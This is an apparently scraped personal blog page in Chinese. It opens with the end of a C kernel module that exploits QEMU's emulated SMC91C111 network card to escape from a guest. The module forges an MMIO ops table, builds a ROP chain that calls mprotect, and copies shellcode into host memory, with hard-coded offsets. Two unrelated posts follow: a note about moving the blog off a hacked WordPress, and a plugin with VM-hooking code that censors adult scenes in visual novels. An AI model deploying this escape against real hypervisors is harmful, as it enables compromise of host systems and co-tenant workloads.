    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return addr[8];
}

uint16_t get_uint16(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint16_t *)&addr[8];
}

uint32_t get_uint32(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    return *(uint32_t *)&addr[8];
}

uint64_t get_uint64(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t low = 0,high = 0;
    set_addr(offset);
    low = *(uint32_t *)&addr[8];
    set_addr(offset+4);
    high = *(uint32_t *)&addr[8];
    return (uint64_t)high<<32 | low;
}

//qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1" -net nic,model=smc91c111 -net user
//mprotect 0x7f11879a2eb0
//libcdata 0x7f1187c65b78
//delta = 0x2c2cc8
//offset = 0x2764
void smc_test(void)
{
    unsigned char * addr = SMC911_BASE;

    uint64_t rop [] = {
        0x00000000006bc31c,//pop rdi; ret;
        0,
        0x000000000052ac4c,//pop rsi; ret;
		0x10000,
		0x0000000000517ea5,//pop rdx; ret;
		0x0000000000000007,//RWE
		0x7f6a14afbeb0,//mprotect
        0x000000000052ac4c,//pop rsi; ret;
		0,
		0x00bc5c1b//jmp rsi;
    };
    uint32_t original_ops = 0, card_base = 0,data_offset=0x2384;
    uint64_t main_arena = 0;
    write_on();
    original_ops = get_uint32(0x43d0-data_offset);
    card_base = get_uint32(0x20b4)-0x4430;

    printk("Host card ops = 0x%0X\ncard base:0x%0X\nfake_mmio_ops:0x%0X\n",original_ops,card_base,card_base+data_offset+0x1800);
    set_memset(0x1800,0,0x80);
    set_uint32(0x1800+1,0x007e29ee);//pop rsi; pop rsp; ret 0x66ff
    set_uint64(0x1800+80,0x6161616162616161);//readb
    set_uint64(0x1800+88,0x6761616168616161);//readw
    set_uint64(0x1800+96,0x6361616164616161);//readl
    set_uint64(0x1800+104,0x696161616a616161);//writeb
    set_uint64(0x1800+112,0x6561616166616161);//writew
    set_uint64(0x1800+120,0x00ba8c41);//writel;push    rdx;call    qword ptr [rbx+1]
    set_uint64(0x1800+0x80,rop[0]+1);
    main_arena = get_uint64(0x2764);
    rop[1] = card_base&0xFFFFFFFFFFFFF000;
    rop[6] = main_arena - 0x2c2cc8;
    rop[8] = card_base+data_offset+0x1888;
    set_memcpy(0x1800+0x66FF+0x88,rop,sizeof(rop));
    set_memcpy(0x1800+0x88,shellcode,sizeof(shellcode));
    set_uint32(0x43d0-data_offset,card_base+data_offset+0x1800);
    *(uint32_t *)&addr[0] = card_base+data_offset+0x1800+0x80;//boom! Can only write low part to rdx because use 32 bit arm,
    //aarch64 can overwrite mmio->ops->valid->max_access_size and mmio->ops->write to achieve extended register control 
    //rsi -> 0-0xf
    //rdx -> 0-0xFFFFFFFF
    //rbx -> controled memory
}

int init_module(void)
{
    smc_test();
    return 0;
}

void cleanup_module(void)
{
}

Another new home

发表于 2017-08-16 | | 阅读次数:

umm，之前常年不管理wordpress，然后这玩意漏洞太多了导致坑娘服务器被撸……于是这次干脆直接要来域名在自己服务器上搭建了，因为wordpress臃肿而且漏洞多……所以以后就用hexo了，感觉这个还是挺清新的。以前的东搬不搬的看心情，各位老爷们要是想看以前的内容请直接访问Internet Archive，以后blog会继续更新。都好几年没写东西了，再不写点感觉自己都废了。

Favorite社通用和谐插件 v0.2【游戏全年龄化

发表于 2014-02-03 | | 阅读次数:

插件下载：
HarmoFavo

v0.2[2014.2.19]
[+]全自动配置
v0.11[2014.2.19]
[+]支持Wiz Anniversary、funta支持不能……那玩意章节表比较奇葩、
[+]CG Patch
v0.1 [2014.2.3]
第一个版本

本插件理论上支持所有使用Favorite社游戏引擎的游戏、并且目前已有的3个汉化版全部支持、现在已经支持全自动和谐……您只需要将本插件释放到游戏目录并用AlphaROMdiE装载游戏即可。
使用方法：【请在使用前认真阅读！
首先确保您的游戏目录是这样的、HarmoFavo下载下去以后直接释放到游戏目录即可

上个图证明可以支持光鸟鸟、色鸟鸟也可以支持、方法看评论一楼的回复
和谐后的光鸟鸟、其他的图就不上了……那个加奈和澪的3P因为是男猪开脑洞梦到的……所以那个没辙╮(￣▽￣”)╭ 顾及18R的小盆友要玩的时候要小心这个坑。

【这里为老版本的说明、不必阅读】然后打开plugin目录、创建一个文本文档命名为config、然后里面的内容是需要解析的游戏的hcb文件。【为了兼容各种汉化补丁所以没有搞成自动的、搞成自动的兼容性会降低的。然后把那个文件从游戏目录复制到plugin目录下、比如我要让星空的记忆FD汉化版和谐一下，就复制汉化后的脚本执行体hoshimemo_ehchn.bch到plugin目录然后再填写config的内容即可。如下图

然后回到游戏目录、启动AlphaROMdiE、勾选禁止转码、把游戏可执行文件拖到上面、比如汉化版是Hoshimemo_EHchn.exe、然后会生成一个快捷方式、以后从这里点进去就是和谐版的游戏啦~

和谐效果如下图

被屏蔽掉的肯定就是H图啦~

有一个误伤的没办法、后来确认了下那张CG的确是出现在某H情节里……

啧啧啧、看看这有多少H

ETC的内容还是可以全部看到的(:з」∠)这里一般不会有H的

吐槽时间：
(:з」∠)这两天戳了下Favorite的引擎、感谢AmaranthF对Favorite社游戏引擎的vm拆解……

hcb可执行体主要分成几个区域

———————
public functions
———————
dispatcher
———————
para jumper[optional]
———————
para code
———————
H memo code
———————

目前的做法比较简单粗暴、就是计算一下H memo code起始的地方、如果有call到这里的话直接给ret回去
插件关键代码

vector<DWORD> ChcbVM::GetNCallSequence(DWORD & offset)
{
	return GetLastNCallSequenceCond(offset,0x01);
}


vector<DWORD> ChcbVM::GetLastNCallSequenceCond(DWORD & offset, BYTE bOP)
{
	vector<DWORD> retVal;
	DWORD ori = bin.seek(0,FILE_CURRENT);
	bin.seek(offset,FILE_BEGIN);
	WORD tmp1;
	BYTE tmp0;
	do 
	{
		bin.read(&tmp0,1);//skip initStack
		offset++;
	} while (tmp0!=0x01);//从一个函数头开始反编译
	bin.read(&tmp1,2);//skip initStack param
	offset+=2;
	for (BYTE op;;)
	{
		op=bin.readb();
		if (op == 0x2)//native call
		{
			DWORD native = bin.readdw();
			retVal.push_back(native);
			offset+=5;
		}
		else if (op==0x1)
		{
			break;
		}
		else if (op==bOP)
		{
			retVal.clear();
			offset+=vmlde(op);
		}
		else
		{
			offset+=vmlde(op);
		}
	}

	bin.seek(ori,FILE_BEGIN);

	return retVal;
}

int comp(const void* a,const void* b)
{
	return *(PDWORD)a>*(PDWORD)b;
}

vector<DWORD> ChcbVM::GetNCallList(DWORD & offset)
{
	auto && res = GetNCallSequence(offset);

	sort(res.begin(),res.end());
	vector<DWORD> retVal;
	for (size_t idx = 0;idx<res.size();++idx)
	{
		if (*(retVal.end()-1)!=res[idx])
		{
			retVal.push_back(res[idx]);
		}
	}
	return retVal;
}


DWORD ChcbVM::AnalysisPara(void)
{
	auto && res = GetLastNCallSequenceCond(hdr.EntryPoint,0x7);//最后的条件跳转后的calllist
	/*
	22C85	jz 22C8F
	22C8A	call 233EC;title
	22C8F	call 22CB1;start
	*/
	DWORD offsetParaDispacher = 0;
	if (res.size())
	{
		int idx = 1;
search0:
		DWORD offset = res[idx];
		auto && res2 = GetNCallSequence(offset);//for most game
		if (res2.size()<=2)
		{
			offsetParaDispacher = *(res2.end() - 1);
		}
		else
		{
			++idx;//Wiz
			goto search0;
		}
	}
	auto && ParaList = GetNCallList(offsetParaDispacher);
	return GetNextFuncOffset(*(ParaList.end() - 1));
}

typedef DWORD (__fastcall __pfnvCall)(void *unk1,DWORD unk0);

DWORD __fastcall vCall(
	void *unk1,//ecx
	DWORD unk0,//edx
	DWORD RetAddr,
	__pfnvCall pfnvCall)
{
	PDWORD pvIP = PDWORD((char *)unk1+offsetvIP);
	if (*pvIP>offsetLast)
	{
		*pvIP = offsetLast;
		return offsetLast;
	}
	return pfnvCall(unk1,unk0);
}

Azure

次元の壁乗り越えてあなたに会ってみたい

RSS

GitHub Twitter